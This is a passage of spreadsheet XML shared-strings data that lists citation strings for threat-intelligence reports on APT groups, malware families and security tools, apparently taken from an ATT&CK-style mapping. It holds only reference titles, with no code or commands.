    <t>(Citation: CISA AA21-200A APT40 July 2021),(Citation: Proofpoint Leviathan Oct 2017),,(Citation: Proofpoint Leviathan Oct 2017),(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>(Citation: Unit42 SilverTerrier 2018),(Citation: Citizen Lab Group5),(Citation: FireEye APT33 Webinar Sept 2017),(Citation: Unit 42 Gorgon Group Aug 2018),,(Citation: DigiTrust NanoCore Jan 2017),(Citation: PaloAlto NanoCore Feb 2016),(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>(Citation: SentinelOne NobleBaron June 2021),,(Citation: MSTIC Nobelium Toolset May 2021),(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>(Citation: Talos NavRAT May 2018),,(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>(Citation: Bitdefender Naikon April 2021),,(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>(Citation: Microsoft NICKEL December 2021),,(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elderwood Sept 2012),,(Citation: Symantec Nerex May 2012),(Citation: Symantec Ristol May 2012)</t>
  </si>
  <si>
    <t>(Citation: Sophos New Ryuk Attack October 2020),(Citation: Bitdefender Naikon April 2021),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: CrowdStrike Ryuk January 2019),(Citation: Dragos Crashoverride 2018),(Citation: Dell TG-1314),(Citation: CISA SoreFang July 2016),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: DFIR Ryuk's Return October 2020),(Citation: Cybereason Soft Cell June 2019),(Citation: Baumgartner Naikon 2015),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Mandiant APT1),(Citation: Trend Micro TA505 June 2019),(Citation: FireEye APT40 March 2019),(Citation: FireEye APT41 Aug 2019),(Citation: Symantec Orangeworm April 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye APT34 Dec 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: NCC Group APT15 Alive and Strong),(Citation: Symantec Elfin Mar 2019),(Citation: Palo Alto OilRig May 2016),(Citation: Kaspersky Turla),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: FireEye APT38 Oct 2018),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: FireEye admin@338),(Citation: US-CERT TA18-074A),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: Alperovitch 2014),(Citation: NCC Group Chimera January 2021),,(Citation: TechNet Net Time),(Citation: Microsoft Net),(Citation: Technet Net Use),(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>(Citation: Cylance Cleaver),,(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA459 April 2017),,(Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>,,(Citation: TrendMicro Netwalker May 2020),(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: CrowdStrike PIONEER KITTEN August 2020),,(Citation: Trend Micro Ngrok September 2020),(Citation: MalwareBytes Ngrok February 2020),(Citation: Zdnet Ngrok September 2018),(Citation: FireEye Maze May 2020),(Citation: Cyware Ngrok May 2019)</t>
  </si>
  <si>
    <t>(Citation: Symantec Suckfly May 2016),(Citation: Symantec Suckfly March 2016),,(Citation: Microsoft SAM),(Citation: Symantec Backdoor.Nidiran)</t>
  </si>
  <si>
    <t>(Citation: Sophos New Ryuk Attack October 2020),(Citation: DFIR Ryuk's Return October 2020),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: Bitdefender FIN8 July 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: FireEye KEGTAP SINGLEMALT October 2020),,(Citation: Fortinet TrickBot),(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: UK NCSC Olympic Attacks October 2020),(Citation: NCSC Sandworm Feb 2020),(Citation: Secureworks IRON VIKING ),(Citation: Trend Micro Cyclops Blink March 2022),,(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: US-CERT NotPetya 2017),(Citation: NCSC Joint Report Public Tools),(Citation: Talos Nyetya June 2017),(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),,(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>(Citation: Symantec Buckeye),,(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>,,(Citation: objectivesee osx.shlayer apple approved 2020),(Citation: sentinelone shlayer to zshlayer),(Citation: Intego Shlayer Apr 2018),(Citation: sentinellabs resource named fork 2020),(Citation: Carbon Black Shlayer Feb 2019),(Citation: 20 macOS Common Tools and Techniques),(Citation: tau bundlore erika noerenberg 2020),(Citation: Intego Shlayer Feb 2018),(Citation: Malwarebytes Crossrider Apr 2018),(Citation: Shlayer jamf gatekeeper bypass 2021)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro MacOS April 2018),(Citation: Amnesty Intl. Ocean Lotus February 2021),,(Citation: TrendMicro MacOS April 2018),(Citation: ESET OceanLotus macOS April 2019),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: sentinelone apt32 macOS backdoor 2020),(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>(Citation: Talos Oblique RAT March 2021),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),,(Citation: Talos Oblique RAT March 2021),(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>,,(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>(Citation: Securelist Octopus Oct 2018),(Citation: ESET Nomadic Octopus 2018),(Citation: Security Affairs DustSquad Oct 2018),,(Citation: Securelist Octopus Oct 2018),(Citation: ESET Nomadic Octopus 2018),(Citation: Security Affairs DustSquad Oct 2018)</t>
  </si>
  <si>
    <t>(Citation: ESET Okrum July 2019),,(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: UK NCSC Olympic Attacks October 2020),(Citation: Secureworks IRON VIKING ),(Citation: CrowdStrike GTR 2019),(Citation: Trend Micro Cyclops Blink March 2022),,(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: PsExec Russinovich),(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes),(Citation: ESET Dukes October 2019),(Citation: Secureworks IRON HEMLOCK Profile),,(Citation: F-Secure The Dukes),(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 OopsIE! Feb 2018),,(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>(Citation: CISA AA21-200A APT40 July 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Accenture MUDCARP March 2019),,(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Muddy Water March 2021),,(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),,(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>,,(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>(Citation: ANSSI Sandworm January 2021),,(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Dell P2P ZeuS)</t>
  </si>
  <si>
    <t>(Citation: JPCert PLEAD Downloader June 2018),(Citation: Symantec Palmerworm Sep 2020),(Citation: Trend Micro Waterbear December 2019),(Citation: TrendMicro BlackTech June 2017),,(Citation: JPCert PLEAD Downloader June 2018),(Citation: ESET PLEAD Malware July 2018),(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye POSHSPY April 2017),,(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 March 2017),,(Citation: Cisco DNSMessenger March 2017),(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>(Citation: ClearSky MuddyWater Nov 2018),(Citation: Symantec MuddyWater Dec 2018),(Citation: FireEye MuddyWater Mar 2018),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: ClearSky MuddyWater June 2019),,(Citation: ClearSky MuddyWater Nov 2018),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: FireEye MuddyWater Mar 2018),(Citation: Unit 42 MuddyWater Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Holmium June 2020),(Citation: FireEye APT33 Guardrail),,(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017),,(Citation: FireEye APT34 Webinar Dec 2017),(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye Fin8 May 2016),,(Citation: Morphisec ShellTea June 2019),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye Fin8 May 2016)</t>
  </si>
  <si>
    <t>(Citation: FireEye Fin8 May 2016),,(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye Fin8 May 2016)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Iron Tiger April 2021),,(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elderwood Sept 2012),,(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>(Citation: Check Point Pay2Key November 2020),(Citation: ClearkSky Fox Kitten February 2020),,(Citation: Check Point Pay2Key November 2020),(Citation: ClearkSky Fox Kitten February 2020)</t>
  </si>
  <si>
    <t>(Citation: TeamTNT Cloud Enumeration),,(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>(Citation: Leonardo Turla Penquin May 2020),,(Citation: Leonardo Turla Penquin May 2020),(Citation: Kaspersky Turla Penquin December 2014)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 ProjectM March 2016),,(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>(Citation: Trustwave Pillowmint June 2020),(Citation: CrowdStrike Carbon Spider August 2021),,(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>(Citation: DFIR Ryuk's Return October 2020),(Citation: Cybereason Soft Cell June 2019),(Citation: Baumgartner Naikon 2015),(Citation: Bitdefender Naikon April 2021),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye APT10 April 2017),(Citation: Group IB APT 41 June 2021),(Citation: Alperovitch 2014),(Citation: ClearSky Siamesekitten August 2021),(Citation: NCC Group APT15 Alive and Strong),(Citation: Symantec Shuckworm January 2022),(Citation: FireEye APT41 Aug 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),,(Citation: TechNet Ping)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 PingPull Jun 2022),,(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>(Citation: ESET PipeMon May 2020),,(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto DNS Requests),,(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>(Citation: Recorded Future REDDELTA July 2020),(Citation: Avira Mustang Panda January 2020),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint TA416 Europe March 2022),(Citation: FireEye APT10 April 2017),(Citation: Kaspersky Winnti April 2013),(Citation: DOJ APT10 Dec 2018),(Citation: Malwarebytes Higaisa 2020),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Profero APT27 December 2020),(Citation: FireEye Clandestine Fox Part 2),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Cybereason Soft Cell June 2019),(Citation: Novetta-Axiom),(Citation: FireEye APT41 Aug 2019),(Citation: Cisco Group 72),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: New DragonOK),(Citation: Dell TG-3390),(Citation: Proofpoint TA459 April 2017),,(Citation: FireEye Clandestine Fox Part 2),(Citation: Stewart 2014),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye APT10 April 2017),(Citation: Trend Micro DRBControl February 2020),(Citation: CIRCL PlugX March 2013),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Lastline PlugX Analysis),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Dell TG-3390),(Citation: Unit42 PlugX June 2017),(Citation: Palo Alto PlugX June 2017),(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Dragos Threat Report 2020),(Citation: Talos PoetRAT April 2020),(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>(Citation: Haq 2014),(Citation: Recorded Future REDDELTA July 2020),(Citation: DustySky2),(Citation: Securelist APT Trends Q2 2017),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: Microsoft GALLIUM December 2019),(Citation: Cybereason Soft Cell June 2019),(Citation: DustySky),(Citation: Symantec Elderwood Sept 2012),(Citation: Mandiant APT1),(Citation: FireEye Operation Molerats),(Citation: Novetta-Axiom),(Citation: Cisco Group 72),(Citation: Villeneuve 2014),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: FireEye admin@338),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Operation Quantum Entanglement),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Cylance Dust Storm),(Citation: FireEye Regsvr32 Targeting Mongolian Gov),(Citation: paloalto Tropic Trooper 2016),(Citation: FireEye Poison Ivy),(Citation: Microsoft PoisonIvy 2017),(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>,,(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elfin Mar 2019),(Citation: SecureWorks August 2019),(Citation: FireEye APT33 Guardrail),,(Citation: SecureWorks August 2019),(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>,,(Citation: MalwareTech Power Loader Aug 2013),(Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</t>
  </si>
  <si>
    <t>(Citation: Volexity PowerDuke November 2016),,(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>(Citation: Cybereason PowerLess February 2022),,(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Actinium February 2022),,(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Inception November 2018),,(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: CISA AA21-200A APT40 July 2021),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: NCC Group TA505),(Citation: FireEye APT41 Aug 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Cymmetria Patchwork),(Citation: FireEye APT33 Guardrail),(Citation: BlackBerry CostaRicto November 2020),(Citation: FoxIT Wocao December 2019),(Citation: PowerSploit Documentation),(Citation: Harmj0y Kerberoast Nov 2016),(Citation: PowerSploit Invoke Kerberoast),(Citation: GitHub PowerSploit May 2012),(Citation: Pentestlab Stored Credentials)</t>
  </si>
  <si>
    <t>(Citation: ESET Turla PowerShell May 2019),,(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>,,(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>,,(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>(Citation: McAfee GhostSecret),,(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT10 April 2017),(Citation: ESET Dukes October 2019),(Citation: BitDefender Chafer May 2020),(Citation: Symantec Dragonfly Sept 2017),(Citation: Dragos Crashoverride 2018),(Citation: Dell TG-1314),(Citation: Gigamon Berserk Bear October 2021),(Citation: F-Secure The Dukes),(Citation: Microsoft GALLIUM December 2019),(Citation: Cybereason Soft Cell June 2019),(Citation: Symantec Leafminer July 2018),(Citation: Baumgartner Naikon 2015),(Citation: Mandiant APT1),(Citation: Group IB Cobalt Aug 2017),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Symantec Chafer February 2018),(Citation: FireEye APT35 2018),(Citation: FireEye FIN6 Apr 2019),(Citation: Symantec Thrip June 2018),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: FireEye FIN6 April 2016),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: Kaspersky Carbanak),(Citation: Symantec Waterbug Jun 2019),(Citation: FireEye APT39 Jan 2019),(Citation: Securelist DarkVishnya Dec 2018),(Citation: Secureworks IRON LIBERTY July 2019),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Cylance Cleaver),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Volexity Exchange Marauder March 2021),(Citation: US-CERT TA18-074A),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: FireEye TRITON 2019),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Symantec Palmerworm Sep 2020),(Citation: Symantec WastedLocker June 2020),(Citation: Dragos Xenotime 2018),(Citation: Check Point Pay2Key November 2020),(Citation: NCC Group Chimera January 2021),(Citation: BlackBerry CostaRicto November 2020),(Citation: FoxIT Wocao December 2019),(Citation: McAfee Night Dragon),(Citation: PsExec Russinovich),(Citation: Russinovich Sysinternals),(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Actinium February 2022),(Citation: Unit 42 Gamaredon February 2022),(Citation: Secureworks IRON TILDEN Profile),(Citation: Symantec Shuckworm January 2022),(Citation: Palo Alto Gamaredon Feb 2017),,(Citation: Microsoft Actinium February 2022),(Citation: Symantec Shuckworm January 2022),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Secureworks Cobalt Gypsy Feb 2017),(Citation: FireEye APT35 2018),(Citation: FireEye APT33 Guardrail),,(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>,,(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 QUADAGENT July 2018),,(Citation: Unit 42 QUADAGENT July 2018),(Citation: GitHub Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>(Citation: ATT QakBot April 2021),,(Citation: Red Canary Qbot),(Citation: Trend Micro Qakbot December 2020),(Citation: Trend Micro Qakbot May 2020),(Citation: Group IB Ransomware September 2020),(Citation: Kaspersky QakBot September 2021),(Citation: Cyberint Qakbot May 2021),(Citation: Crowdstrike Qakbot October 2020),(Citation: ATT QakBot April 2021),(Citation: Kroll Qakbot June 2020)</t>
  </si>
  <si>
    <t>(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: DOJ APT10 Dec 2018),(Citation: Securelist APT10 March 2021),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: Symantec Cicada November 2020),(Citation: Volexity Patchwork June 2018),(Citation: TrendMicro Patchwork Dec 2017),(Citation: ESET BackdoorDiplomacy Jun 2021),,(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Volexity Patchwork June 2018),(Citation: GitHub QuasarRAT)</t>
  </si>
  <si>
    <t>(Citation: CameraShy),(Citation: Baumgartner Naikon 2015),,(Citation: Aquino RARSTONE),(Citation: Camba RARSTONE)</t>
  </si>
  <si>
    <t>(Citation: Lazarus RATANKBA),,(Citation: RATANKBA),(Citation: Lazarus RATANKBA)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Iron Tiger April 2021),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Profero APT27 December 2020),,(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>(Citation: Unit42 RDAT July 2020),,(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>(Citation: Secureworks GandCrab and REvil September 2019),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: FBI Flash FIN7 USB),(Citation: Secureworks REvil September 2019),(Citation: IBM Ransomware Trends September 2020),,(Citation: Group IB Ransomware May 2020),(Citation: Picus Sodinokibi January 2020),(Citation: McAfee Sodinokibi October 2019),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: G Data Sodinokibi June 2019),(Citation: BleepingComputer REvil 2021),(Citation: Kaspersky Sodin July 2019),(Citation: Intel 471 REvil March 2020),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Talos Sodinokibi April 2019),(Citation: Cylance Sodinokibi July 2019),(Citation: McAfee REvil October 2019),(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 RGDoor Jan 2018),,(Citation: Unit 42 RGDoor Jan 2018),(Citation: ESET IIS Malware 2021)</t>
  </si>
  <si>
    <t>(Citation: Moran 2014),,(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Oct 2021),,(Citation: Roadtools)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 Aug 2019),,(Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>(Citation: Securelist ScarCruft May 2019),(Citation: Talos Group123),,(Citation: Talos ROKRAT),(Citation: Talos Group123),(Citation: Talos ROKRAT 2),(Citation: Securelist ScarCruft May 2019),(Citation: NCCGroup RokRat Nov 2018),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>(Citation: ESET RTM Feb 2017),,(Citation: Unit42 Redaman January 2019),(Citation: ESET RTM Feb 2017),(Citation: CheckPoint Redaman October 2019)</t>
  </si>
  <si>
    <t>,,(Citation: Cynet Ragnar Apr 2020),(Citation: Sophos Ragnar May 2020),(Citation: FBI Ragnar Locker 2020)</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Secureworks IRON RITUAL Profile),(Citation: Symantec RAINDROP January 2021),,(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Antiy CERT Ramsay April 2020),(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>(Citation: Novetta Blockbuster Destructive Malware),(Citation: Novetta Blockbuster),,(Citation: Unit 42 Shamoon3 2018),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: DarkReading FireEye FIN5 Oct 2015),,(Citation: Visa RawPOS March 2015),(Citation: Kroll RawPOS Jan 2017),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: TrendMicro RawPOS April 2015)</t>
  </si>
  <si>
    <t>,(Citation: DFIR Conti Bazar Nov 2021),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Rclone)</t>
  </si>
  <si>
    <t>,,(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: DOJ APT10 Dec 2018),,(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye APT10 April 2017),(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017),(Citation: Cybereason Soft Cell June 2019),(Citation: US-CERT TA18-074A),(Citation: Palo Alto OilRig May 2016),(Citation: Kaspersky Turla),(Citation: Rancor Unit42 June 2018),(Citation: McAfee Honeybee),(Citation: Microsoft Reg),(Citation: Pentestlab Stored Credentials)</t>
  </si>
  <si>
    <t>,,(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: ESET Operation Spalax Jan 2021),(Citation: Fortinet Remcos Feb 2017),(Citation: Riskiq Remcos Jan 2018),(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>(Citation: Symantec Chafer February 2018),(Citation: Securelist Remexi Jan 2019),(Citation: Symantec Chafer Dec 2015),,(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>(Citation: Symantec Strider Blog),(Citation: Kaspersky ProjectSauron Blog),,(Citation: Kaspersky ProjectSauron Full Report),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Symantec Remsec IOCs)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Oct 2018),(Citation: FireEye APT28 Hospitality Aug 2017),(Citation: ClearSky Lazarus Aug 2020),,(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>(Citation: Cylance Shaheen Nov 2018),,(Citation: Cofense RevengeRAT Feb 2019),(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),,(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>,(Citation: McAfee Sharpshooter December 2018),(Citation: Bleeping Computer Op Sharpshooter March 2019),(Citation: McAfee Sharpshooter December 2018),(Citation: Bleeping Computer Op Sharpshooter March 2019)</t>
  </si>
  <si>
    <t>,,(Citation: CarbonBlack RobbinHood May 2019)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 DarkHydrus July 2018),(Citation: Unit42 DarkHydrus Jan 2019),,(Citation: Unit 42 DarkHydrus July 2018),(Citation: GitHub Invoke-Obfuscation),(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>,,(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Holmium June 2020),(Citation: FireEye APT33 Guardrail),,(Citation: SensePost Ruler GitHub)</t>
  </si>
  <si>
    <t>,,(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>(Citation: Sophos New Ryuk Attack October 2020),(Citation: DFIR Ryuk's Return October 2020),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: CrowdStrike Ryuk January 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: FireEye FIN6 Apr 2019),(Citation: CrowdStrike Wizard Spider October 2020),,(Citation: ANSSI RYUK RANSOMWARE),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: CrowdStrike Ryuk January 2019),(Citation: Bleeping Computer - Ryuk WoL),(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>(Citation: IBM TA505 April 2020),(Citation: Proofpoint TA505 October 2019),,(Citation: IBM TA505 April 2020),(Citation: Proofpoint TA505 October 2019),(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>(Citation: Group IB Silence Sept 2018),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Mandiant No Easy Breach),,(Citation: Microsoft SDelete July 2016)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Webinar Dec 2017),,(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro POWERSTATS V3 June 2019),,(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye Clandestine Wolf),,(Citation: Palo Alto CVE-2015-3113 July 2015),(Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
    <t>,,(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: GitHub SILENTTRINITY March 2022),(Citation: Security Affairs SILENTTRINITY July 2019)</t>
  </si>
  <si>
    <t>,,(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>,,(Citation: FireEye Shining A Light on DARKSIDE May 2021),(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT10 April 2017),,(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>(Citation: Flashpoint FIN 7 March 2019),,(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>(Citation: DHS CISA AA22-055A MuddyWater February 2022),,(Citation: Mandiant UNC3313 Feb 2022),(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>,(Citation: Mandiant UNC3890 Aug 2022),(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
